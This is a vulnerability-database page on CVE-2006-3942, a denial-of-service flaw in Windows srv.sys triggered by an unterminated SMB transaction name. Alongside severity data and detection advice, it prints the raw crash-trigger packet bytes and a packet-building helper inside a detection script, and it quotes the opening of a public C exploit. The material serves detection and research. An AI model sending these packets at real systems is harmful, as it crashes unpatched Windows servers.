CVE-2006-3942
Published: 2006-07-31
Priority: P349 (high)
CVSS 2.0: 7.8, vector AV:N/AC:L/Au:N/C:N/I:N/A:C
Exploit: available
EPSS: 75.74% (99.5th percentile)
The server driver (srv.sys) in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (system crash) via an SMB_COM_TRANSACTION SMB message that contains a string without null character termination, which leads to a NULL dereference in the ExecuteTransaction function, possibly related to an "SMB PIPE," aka the "Mailslot DOS" vulnerability. NOTE: the name "Mailslot DOS" was derived from incomplete initial research; the vulnerability is not associated with a mailslot.
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCs (extracted from sources)
- Byte pattern (SMB_COM_NEGOTIATE request): `\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00`
- Byte pattern (SMB_COM_TRANSACTION request, command 0x25, with an unterminated \MAILSLOT\LANMAN name): `\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41`
- Detect SMB_COM_TRANSACTION (SMB command 0x25) packets targeting \MAILSLOT\ paths that lack null termination in the transaction name string; this is what triggers the NULL dereference in ExecuteTransaction in srv.sys.
- Alert on SMB mailslot write responses where the two-byte field in the response packet is consistently set to 0xFFFF, indicative of the MS06-035 kernel pool corruption variant.
- Inspect the srv.sys kernel driver for unexpected NULL dereferences originating from the ExecuteTransaction function, which is the crash point for this vulnerability.
- The vulnerability name "Mailslot DOS" is a misnomer from incomplete initial research: the flaw is not actually associated with a mailslot in the traditional sense, so detection rules should not be scoped exclusively to mailslot traffic.
- Two separate but related bugs exist under MS06-035: a kernel pool corruption via mailslot write (slow, two-byte overwrite) and a NULL pointer dereference via an SMB PIPE transaction with no null termination (Metasploit module ms06_063_trans). Detection logic should cover both variants.
- The NULL pointer dereference variant (ms06_063_trans) was independently discovered by CORE Security and ISS, meaning public exploit code from multiple sources may differ in structure.
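As an added example (not code from this page or from any of the projects it lists), the following Python implements the first detection hint above: it parses an SMB1 SMB_COM_TRANSACTION request, locates the transaction name inside the byte area that follows the word block, and flags a name with no NUL terminator anywhere in that area. The packet layout is the standard MS-CIFS one; the sample packets are constructed here, and SMB replies or requests with the Unicode flag set are reported as not inspected rather than guessed at.

```python
import struct

SMB_COM_TRANSACTION = 0x25   # command byte of interest
FLAGS2_UNICODE = 0x8000      # Flags2 bit: name is UTF-16, needs a two-byte terminator check
FLAGS_REPLY = 0x80           # Flags bit: message is a server reply, not a request

def build_trans_request(name: bytes, setup=(0x26, 0x0000), data: bytes = b"") -> bytes:
    """Constructed sample: minimal SMB_COM_TRANSACTION request with NetBIOS framing.
    TID/PID/UID/MID are dummy values; the data block (if any) follows the name."""
    hdr = b"\xffSMB" + bytes([SMB_COM_TRANSACTION]) + b"\x00" * 4     # protocol id, command, status
    hdr += b"\x00" + struct.pack("<H", 0x0001)                          # Flags, Flags2 (ASCII names)
    hdr += b"\x00" * 12                                                 # PIDHigh, signature, reserved
    hdr += struct.pack("<HHHH", 0x0800, 0x0588, 0x0800, 0x0000)         # TID, PID, UID, MID
    setup_bytes = struct.pack("<%dH" % len(setup), *setup)
    doff = 33 + 28 + len(setup_bytes) + 2 + len(name)                   # offset of data from SMB header
    words = struct.pack("<HHHHBBHIHHHHHBB", 0, len(data), 0, 0xFFE0, 0, 0, 0, 0, 0,
                        0, doff, len(data), doff, len(setup), 0)
    body = bytes([14 + len(setup)]) + words + setup_bytes               # WordCount + 14 words + setup
    body += struct.pack("<H", len(name) + len(data)) + name + data      # ByteCount + byte area
    smb = hdr + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb                  # NetBIOS session message

def unterminated_trans_name(pkt: bytes):
    """True if pkt is an ASCII SMB_COM_TRANSACTION request whose byte area holds no NUL at all
    (the name can never terminate), False if a NUL is present, None if not inspected."""
    if len(pkt) < 37 or pkt[4:8] != b"\xffSMB":
        return None
    smb = pkt[4:4 + int.from_bytes(pkt[1:4], "big")]
    if smb[4] != SMB_COM_TRANSACTION or smb[9] & FLAGS_REPLY:
        return None
    if struct.unpack_from("<H", smb, 10)[0] & FLAGS2_UNICODE:
        return None                                   # UTF-16 names are out of scope here
    wct = smb[32]
    if wct < 14 or len(smb) < 35 + 2 * wct:
        return None                                   # malformed or truncated word block
    bcc = struct.unpack_from("<H", smb, 33 + 2 * wct)[0]
    start = 35 + 2 * wct
    area = smb[start:start + bcc]
    # A NUL inside the parameter/data block would still stop the server's string scan
    # (mis-parsed name, but no crash), so only a NUL-free byte area is flagged.
    return b"\x00" not in area
```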
No detection rules found.
Exploit-DB: Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035) (exploitdb, 2006-07-21)
---
```c
#include
#include
#include
/*******************************************************************
Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.7.19
page:http://ruder.cdut.net
*******************************************************************/
unsigned char SmbNeg[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
unsigned char Session_Setup_AndX_Request[]=
"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\
```
Metasploit: Microsoft SRV.SYS Mailslot Write Corruption
This module triggers a kernel pool corruption bug in SRV.SYS. Each call to the mailslot write function results in a two byte return value being written into the response packet. The code which creates this packet fails to consider these two bytes in the allocation routine, resulting in a slow corruption of the kernel memory pool. These two bytes are almost always set to "\xff\xff" (a short integer with value of -1).
Metasploit: Microsoft SRV.SYS Pipe Transaction No Null
This module exploits a NULL pointer dereference flaw in the SRV.SYS driver of the Windows operating system. This bug was independently discovered by CORE Security and ISS.
No writeups or analysis indexed.
References
- http://blogs.technet.com/msrc/archive/2006/07/28/443837.aspx
- http://secunia.com/advisories/21276
- http://securitytracker.com/id?1016606
- http://securitytracker.com/id?1017035
- http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10
- http://www.osvdb.org/27644
- http://www.securityfocus.com/archive/1/443287/100/200/threaded
- http://www.securityfocus.com/archive/1/449179/100/0/threaded
- http://www.securityfocus.com/bid/19215
- http://www.vupen.com/english/advisories/2006/3037
- http://xforce.iss.net/xforce/alerts/id/231
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-063
- https://exchange.xforce.ibmcloud.com/vulnerabilities/27999
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A428